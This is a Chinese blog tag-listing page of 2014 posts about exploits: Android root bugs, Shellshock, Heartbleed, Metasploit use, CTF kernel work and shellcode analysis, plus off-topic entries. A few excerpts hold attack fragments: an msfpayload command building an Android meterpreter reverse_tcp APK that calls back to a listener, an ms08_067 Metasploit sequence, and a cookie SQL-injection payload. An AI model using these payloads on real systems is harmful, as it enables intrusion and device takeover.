Exploit

alictf linux exploit解题

1.加载模块sudo insmod moduledmesg看到有hook字样,猜测可能是模块劫持了系统调用,或者也可能是增加了系统调用然后自己写了个程序来遍历系统调用,确认了没有增加系统调用然后自己又写了个模块来遍历sys_call_table和sys_ia32_call_table数组,确认是改动了系统调用.而且系统调用号是184同时/proc/kallsyms中的符号表和sys_call_ta
小利子·2014-10-23 19:00

Zend Studio代码无法自动提示以及代码跟踪函数和变量问题的解决方法

  后来发现有一篇外文(http://www.exploit.cz/php/zend-studio-code-autocomplete-fix.html)讲了这个问题的解决方法: 1.
wangking717·2014-10-22 22:00

漏洞分析---Bash安全漏洞(CVE-2014-6271)技术简析

安全漏洞(CVE-2014-6271)技术简析转自爱毒霸社区,原文链接:http://bbs.duba.net/thread-23211524-1-1.html一、漏洞起源漏洞信息最早来源于国外知名漏洞网站exploit-db
蚍蜉撼青松·2014-10-21 17:22

【逆向篇】分析一段简单的ShellCode——从TEB到函数地址获取

在http://www.exploit-db.com/exploits/28996/上看到这么一段最简单的ShellCode,其中的技术也是比较常见的,0day那本书上也提到过,大神都用烂了。
轩辕之风·2014-10-17 18:00

Android adb setuid提权漏洞之分析

/*android1.x/2.xadbsetuid()rootexploit *(C)2010TheAndroidExploidCrew * *Needstobeexecutedviaadb-dshell.Itmaytakeawhileuntil
wangkaiblog·2014-10-17 12:00

目标跟踪系列十一:Exploiting the Circulant Structure of Tracking-by-detection with Kernels代码思路

Tracking学习系列原创,转载标明出处: http://blog.csdn.net/ikerpeng/article/details/40144497这篇文章很赞啊!很有必要将其好好的学习,今天首先记录它的代码思路(详细的推导过程后面会给出的)。首先,这篇文章使用的决策函数是一个结构风险最小化的函数:                               这个函数中:前面是一个损失函数,
u012192662·2014-10-17 10:00

最好的Android安全测试框架 – Drozer

drozer可以帮助Androidapp和设备变得更安全,其提供了很多Android平台下的渗透测试exploit供你使用和分享。
phper·2014-10-17 03:00

[译]jboss漏洞利用

原文地址:http://resources.infosecinstitute.com/jboss-exploitation/JBossApplicationServer是一个基于JaveEE的web应用服务器
j4s0nh4ck·2014-10-15 01:00

[译]jboss漏洞利用

原文地址:http://resources.infosecinstitute.com/jboss-exploitation/JBossApplicationServer是一个基于JaveEE的web应用服务器
j4s0nh4ck·2014-10-14 17:00

shell学习经典

原文链接:http://blog.csdn.net/freexploit/article/details/626660我在CU的日子并不长,有幸在shell版上与大家结缘。
xionglang7·2014-10-14 16:00

Sec site list

Seclist: 英语: http://seclists.org/ http://www.securityfocus.com/ http://www.exploit-db.com/ http://www.us-cert.gov
dipolar·2014-10-11 13:00

bash漏洞利用【部分转载】

文章转自http://bbs.kafan.cn/thread-1774478-1-1.html里面内容做了部分修改 BASH漏洞来源BASH漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765
zdhua211·2014-09-28 17:46

OSX BASH 漏洞修复指南

实测有效,链接: http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve
随影求是·2014-09-27 14:00

CSAPP 六个重要实验 lab3

CSAPP&&lab3        Inthislab,youwillgainfirsthandexperiencewithoneofthemethodscommonlyusedtoexploitsecurityweaknessesin
u011368821·2014-09-15 17:00

显著性论文学习阶段总结(二)

1.Ali Borji, Laurent Itti, Exploiting Local and Global Patch Rarities for Saliency Detection, CVPR20121
todayq·2014-09-03 14:00

XSS 跨站代码大全总结

alert('xss'))}html实体:unicode:上面是普通的163的filter过滤语句跨站代码"\\filter己将上述label理解为三个label,语法分析与其后语句关联分析时己失效.exploit
tavole·2014-09-03 14:05

metasploit(MSF)终端命令大全

showexploits列出metasploit框架中的所有渗透攻击模块。showpayloads列出metasploit框架中的所有攻击载荷。
卧龙安全·2014-09-01 17:51

metasploit获取vsftp服务器root权限

开始菜单路径backtrack/Exploitationtools/NetworkExploitationtools/MetaspolitFramewor
卧龙安全·2014-09-01 15:05

IBM Sametime Meet Server 8.5 Password Disclosure

#ExploitTitle:IBMSametimeMeetServer8.5PasswordDisclosure #GoogleDork:intitle:"MeetingCenter-IBMLotusSametime
cnbird2008·2014-08-20 17:00

metasploit(MSF)终端命令大全

showexploits列出metasploit框架中的所有渗透攻击模块。showpayloads列出metasploit框架中的所有攻击载荷。
u011843461·2014-08-18 16:00

经典漏洞合集整理备份

启航企业建站系统cookie注入漏洞通杀所有版本直接上exploit:javascript:alert(document.cookie="id="+escape("1and1=2unionselect1
lizhengnanhua·2014-08-09 02:00

TPLINK渗透实战

from:http://www.exploit-db.com/wp-content/themes/exploit/docs/33369.pdf0x00工具一台笔记本电脑TD-W8901D路由器(firmware6.0.0
代码析构师·2014-08-07 15:50

Shodan搜索引擎介绍

Shodan搜索引擎介绍07月1日,2014LINUX操作系统社会工程学社工技巧神兵利器-Y.C299次本文转载乌云知识库from:http://www.exploit-db.com/wp-content
草帽小子_DJ·2014-08-04 23:32

Exploit-DB漏洞利用库

Backtrack已经内置了一个由”OffebnsiveSecurity”提供的漏洞利用程序集的数据库Exploit-DB,可以用于平时的参考和使用。
草帽小子_DJ·2014-08-02 21:50

hdu 3613 Best Reward回文子串Manocher算法

ProblemDescriptionAfteranuphillbattle,GeneralLiwonagreatvictory.Nowtheheadofstatedecidetorewardhimwithhonorandtreasuresforhisgreatexploit.Oneofthesetreasuresisanecklacemadeupof26differentkindsofgemsto
firenet1·2014-08-01 14:00

漏洞评估和渗透测试的区别

LanguageMattersClarifiedDefinitionsAPhysicalAnalogTheExploitationAnglePentestsDon’tIncludeVASummaryTherearemanyviewsonwhatconstitutesaVulnerabilityAssessmentversusaPenetrationTest.Themaindistinction
Cnlouds·2014-07-21 18:00

栈对齐对栈溢出带来的影响

//http://exploit-exercises.com/protostar/stack4 //一个栈溢出的小练习 #include  #include  #include  #include 
小利子·2014-07-09 11:00

firefox插件-HackBar介绍与试用

It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site.
·2014-07-07 13:00

Root exploit for Android and Linux(CVE-2010-4258)

/*本文章由莫灰灰编写,转载请注明出处。 作者:莫灰灰  邮箱: [email protected]*/一.漏洞简介CVE-2010-4258这个漏洞很有意思,主要思路是如果通过clone函数去创建进程,并且带有CLONE_CHILD_CLEARTID标志,那么进程在退出的时候,可以造成内核任意地址写0的bug。PoC代码利用了多个漏洞来达到权限提升的目的。二.前置知识(进程创建、退出)1.当f
hu3167343·2014-07-04 17:00

Root exploit for Android (adb setuid)

/*本文章由莫灰灰编写,转载请注明出处。 作者:莫灰灰  邮箱: [email protected]*/1.漏洞分析这是个很老的漏洞了,主要利用adb启动的时候调用setuid函数降到shell权限,却没有判断setuid返回失败的情况,因此造成了root的可能如下是已经修复漏洞后的代码:原本的代码大致如下:setgid(AID_SHELL); setuid(AID_SHELL);而setxid
hu3167343·2014-07-02 17:00

Android exploit with a Qualcomm processor (CVE-2012-4220)

/*本文章由莫灰灰编写,转载请注明出处。 作者:莫灰灰  邮箱: [email protected]*/1.漏洞描述在处理DIAG设备的ioctl系统调用参数时,一些未经验证的引用自用户层的不可信指针被使用了。对于本地安装的应用程序来说,可以使用这个漏洞来实施拒绝服务攻击,或者在内核下执行任意代码。2.漏洞分析}elseif(iocmd==DIAG_IOCTL_GET_DELAYED_RSP_I
hu3167343·2014-07-01 14:00

Linux 通配符可能产生的问题

from:https://dicesoft.net/projects/wildcard-code-execution-exploit.htm0x00通配符当你在一个bash命令行中输入“*”时,bash
Feng_Yu·2014-06-26 16:00

Root exploit on Exynos(CVE-2012-6422)

/*本文章由莫灰灰编写,转载请注明出处。 作者:莫灰灰  邮箱: [email protected]*/1.漏洞成因这是一个内核安全漏洞,主要的漏洞设备是/dev/exynos-mem。这个设备对所有用户都是读/写(R/W)权限,黑客可以利用这个设备对内核物理内存进行映射,并且改写。三个会利用/dev/exynos-mem的库文件。/system/lib/hw/camera.smdk4x12.s
hu3167343·2014-06-25 12:00

使用metasploit console

/知识抄袭/////////////////////////////////////////////////////////////////////////////////////msf >show exploits
simyang·2014-05-17 19:00

metaspliot一些练习

searchvsftpdMatchingModules================NameDisclosureDateRankDescription----------------------------------exploit
平_繁·2014-04-22 21:07

IE浏览器鼠标坐标跟踪安全风险,通杀全版本---IE的最大特色

影响版本:IE6-10测试:在系统目录下新建一个html文件,代码如下: ExploitDemo window.attachEvent("function(){ vardetector=document.getElementById
huangyanxiong·2014-04-14 19:31

IE浏览器鼠标坐标跟踪安全风险,通杀全版本---IE的最大特色

影响版本:IE6-10测试:在系统目录下新建一个html文件,代码如下:ExploitDemowindow.attachEvent("function(){vardetector=document.getElementById
huangyanxiong·2014-04-14 19:31

OpenSSL 的 Heartbleed 漏洞的影响到底有多少? - 知乎

他发了一个exploit的demo给我,原链接已经撤掉了,所以我放到了gist上:http://gist.github.com/RixTox/10222402 Pyhton3版的在这里OpenSSLheartbeatPoCwithSTART
·2014-04-10 00:00

Weekly Metasploit Update: Android WebView Exploit

Android WebView Exploit, 70% Devices VulnerableThis week, the biggest news I think we have is the release
小跑堂·2014-03-31 11:54

metasploit入侵Android手机

msfpayloadandroid/meterpreter/reverse_tcpLHOST=172.16.1.109LPORT=4444R>/root/Desktop/apk.apk2.打开metasploit useexploit
w2630460·2014-03-24 21:41

How to hack windows 8 using kali linux

由于我是先发在qq空间里了,复制过来时图片禁止外链,下面有这篇文章完整版的附件提供下载1.msfconsoleshowexploitsusewindows/smb/ms08_067_netapishowpayloads2
公羊角·2014-03-23 20:44

Oracle 中rank() 对表中的数据进行分级排序

摘自:http://oracle.chinaitlab.com/exploiture/831910.html rank()对表中的数据进行分级排序譬如有张学生成绩统计单的表STUDENT_RESULTnamenumberkemufenshuli0113101
myflysun·2014-03-07 10:00

诺基亚nokia x手机一键root权限获取教程(附一键root权限工具下载)

注:Framaroot借助设备漏洞,即GandalfExploit,实现ROOT功能。2、下载RootExplorer(RE管理器
佚名·2014-03-03 09:24

漏洞利用脚本[exploit]编写

/usr/bin/python #coding:utf-8 # #time:2014-2-21 #write:jack #info dedecms oday plus.search.php  exploit
阿木阿木·2014-02-21 20:00

Ubuntu 安全检查

Ubuntu安全检查(后门检测)3个程序:chkrootkit可以扫描rootkits rkhunter可以扫描rootkitbackdoorsnifferexploit unhide可以发现隐藏的进程和端口
huithe·2014-02-11 10:00

白帽子讲Web安全读书笔记

在黑客的世界里,有的黑客,精通计算机技术,能够自己挖掘漏洞,并编写“exploit”(黑客们使用的漏洞利用代码叫做exploit);而有的黑客,只是对攻击本身感兴趣,对计算机原理
-御舟-·2014-02-08 14:22

【逆向篇】分析一段简单的ShellCode——从TEB到函数地址获取

在http://www.exploit-db.com/exploits/28996/上看到这么一段最简单的ShellCode,其中的技术也是比较常见的,0day那本书上也提到过,大神都用烂了。
轩辕之风·2014-02-01 19:00

某些TP-Link路由器可以被远程获取密码

(FULLDISCLOSURE)Helloeveryone,IjustwantedtodiscusssomevulnerabilityIfoundandexploitedforGOODNESS..justsothatSCRIPTKIDIESwon
FGQ·2014-01-19 17:00

shark应用cache

转自官网UnlikeHive,Sharkallowsuserstoexploitthistemporallocalitybycachingtheirworkingsetofdata,orindatabaseterms
Johnny_Lee·2014-01-17 17:00

暗渡陈仓:披着图片外衣的特洛伊木马

下面,我们就来看看一个通过exploitkit(全自动攻击工具)部署在受害者电脑上的恶意.NET文件。用反编译器打开该文件后,发现资源中只包含如下干扰图片:以位图方式打开
weakish·2014-01-08 00:00
上一页 36 37 38 39 40 41 42 43 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他